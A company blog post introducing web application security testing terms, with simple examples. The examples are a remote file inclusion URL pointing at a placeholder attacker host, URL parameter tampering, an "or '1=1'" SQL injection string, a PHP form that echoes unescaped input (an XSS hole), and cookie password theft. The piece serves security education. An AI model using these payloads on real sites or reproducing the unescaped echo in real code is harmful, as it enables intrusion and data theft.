Blog

Latest technology news, trends and developers guide for business application. Visit this space for more tech updates.

Let’s work on your exciting new project together!

SECURITY TESTING

App Security, Cloud Security

Introduction
 
As continues we are using web applications the size of useful data on the web increases, proper security testing of web applications is becoming very important. Security testing is the very much important process of testing life cycle, It is the process to confirm that confidential data stays confidential and users have access to perform only those tasks which are authorized to access.
 
The purpose of the security test is to discover the vulnerabilities of the web application so that the developers can then remove these vulnerabilities from the application and make the web application and data safe from unauthorized actions.
 
Key Terms Used in Security Testing
 
1. Vulnerability
 
It is like any type of weakness in the web application. The cause of it can be bugs in the application, an injection (SQL/ script code) or the presence of viruses.
 
Vulnerability can be as simple as weak passwords or as complex SQL injection vulnerabilities.
 
Example
  • http://www.testattack.com/index.php?page=http://www.vulnerabilityattack.com/attack.txt (This attack is for executing attack code on remote server)
 
2. URL Manipulation
 
Also known as URL rewriting, is the process of modifying parameters. Websites communicate with servers for sharing information to client (browser). Changing some information in the URL may sometimes lead to abnormal behaviour by the server.
 
The tester must check url if the application passes important information in the query string. This happens when the application uses the HTTP methods to pass information between the client and the server. The tester can modify a parameter value in the query string to check if the server accepts it.
 
Example
  • http://www.testattack.com/savepage.php?nr=147&status=del (Changed status code from add to del to delete)
  • http://www.testattack.com/customerdetails.php?cid=149 (Changed customer Id to view the details of customer id = 149)
 
3. SQL Injection
 
This is code injection technique through the web application. In this technique site parameters are passed to database in form of SQL query in order to access database or modify it. Special characters from user inputs should be handled/escaped properly.
 
Entering a single quote (‘) in any textbox should be rejected by the application. If the tester succeeds to generate a database error, it means that the user details inserted in some query which is then executed by the application. In such a case, the application is vulnerable to SQL injection.
 
Example
  • Write below query in input fields and submit page rather than write in url and post page on server.
  • “SELECT * FROM users WHERE username = ‘martin'”; 
  • “SELECT * FROM users WHERE username = ” or ‘1=1′”;
 
4. XSS (Cross Site Scripting)
 
It is a type of injection which is typically found in web applications. Attacker can use this method to execute malicious script or URL on victim’s browser. Using cross-site scripting, attacker can use scripts like JavaScript to catch user cookies and information stored in the cookies.
 
The tester should additionally check the web application for XSS (Cross site scripting). Any HTML e.g. <HTML> or any script e.g. <SCRIPT> should not be accepted by the application.
 
Example
  • http://www. testattack.com/index.php?userid=123&query=xyz
  • <form action=”view.php” method=”GET” /> Welcome <p>Enter your name: <input type=”text” name=”myname” /><br /> <input type=”submit” value=”Find” /></p><br> </form> <?php echo “<p>Your Name <br />”; echo ($_GET[myname]); ?>
 
5. Password Cracking
 
In security testing of a web application Password cracking methods can be used to identify weak passwords. It can be start using guessing the common username and password or use of password cracking tool.
 
If username or password is stored in cookies without encrypting, attacker can use different methods to steal username and password.
 
Example
  • Try to get username and password details from cookie in browser.
  • Modify variables using view source and resubmit page. 
 
6. Penetration
 
It is a type of security testing process to find out insecure areas in projects. The main purpose of this testing is to protect the secure/important data from unknown user who is not valid user of the system like hackers.
 
There are two types of penetration testing, White box testing & Black box testing. In White box testing tester is having all information of system like IP Address, Code & flow diagram & based on available information tester will perform the testing. In Black box testing, tester will perform testing without having any information of system. This will be more accurate testing method as testing done like real hackers.
 
Example 
  • Try to get password using reset feature. 
  • Input validations must be validated server side also.
 
Conclusion
 
In this blog we’ve explained common terms which are used in web application vulnerabilities. Also we need to take care while security testing, the tester must be very careful and not to modify any of the following:
 
  • Configuration of the application or the server.
  • Services running on the server.
  • Existing user or customer data hosted by the application.
 
Additionally, a security test should be avoided on a production system.

How to do user authentication in MongoDB, Prevent others to access MongoDB ?

MongoDB, a cross-platform document-oriented database. Classified as a NoSQL database, MongoDB eschews the traditional table-based...

Open Source Technologies in IoT & Managing Security

Internet of Things (IoT) will no doubt integrate the world and its workings in a...

New Technologies that are shaping the Future of Retail

Whether you possess the small group of grocery stores chains or the multi dollar business,...

We are always happy to hear from you - Share your business requirements. Our business experts will reach you shortly

 

Select Your Requirement

Secure : We'll ensure, all the information provided by you will not be shared with anyone and your details are completely safe.

We respect your privacy. *Privacy Policy

Select Your Requirement

Secure : We'll ensure, all the information provided by you will not be shared with anyone and your details are completely safe.

We respect your privacy. *Privacy Policy